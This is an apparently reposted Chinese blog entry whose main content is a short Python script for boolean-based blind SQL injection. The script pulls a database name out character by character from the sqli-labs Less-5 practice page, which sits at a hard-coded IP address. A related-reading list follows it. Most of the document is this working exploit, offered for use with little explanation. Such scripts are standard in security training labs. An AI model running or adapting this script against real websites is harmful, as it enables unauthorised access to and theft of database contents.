zoukankan      html  css  js  c++  java

  • 盲注脚本2.基于bool

    盲注脚本2.基于bool

     1 #!/usr/bin/env python 
 2 #encoding:utf-8
 3 #by i3ekr
 4 #using
 5 #    python sqlinject.py -D "数据库名" -T "表明" -C "列明" --dump "列明"
 6 #
 7 import requests,re,os
 8 web = "http://139.199.179.167/sql-inject/sqli-labs/Less-5/index.php?id=1"
 9 payloads = list("abcdefghijklmnopqrstuvwxyz0123456789@_.")
10 headers = {
11     'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
12 }
13 value = ''
14 
15 for i in xrange(1,15,1):
16     for payload in payloads:
17         url = web + "' and ascii(mid(database(),%d,1))=%d--+"%(i,ord(payload))
18         html_doc = requests.get(url,params=headers,timeout=2).text
19         if "You are" in html_doc:
20             value += payload
21             print "[+][%d] database name is:%s"%(i,payload)
22             break
23         else:
24             pass
25 
26 print value
  • 相关阅读:
    Network File System
    模拟网络抖动及网络延迟
    python with statements
    Centos 7
    Blind Carbon Copy
    git
    python time
    valgrind3.11.0
    tinycore os
    about arp_ignore arp_filter arp_announce rp_filter
  • 原文地址:https://www.cnblogs.com/nul1/p/8537202.html
Copyright © 2011-2022 走看看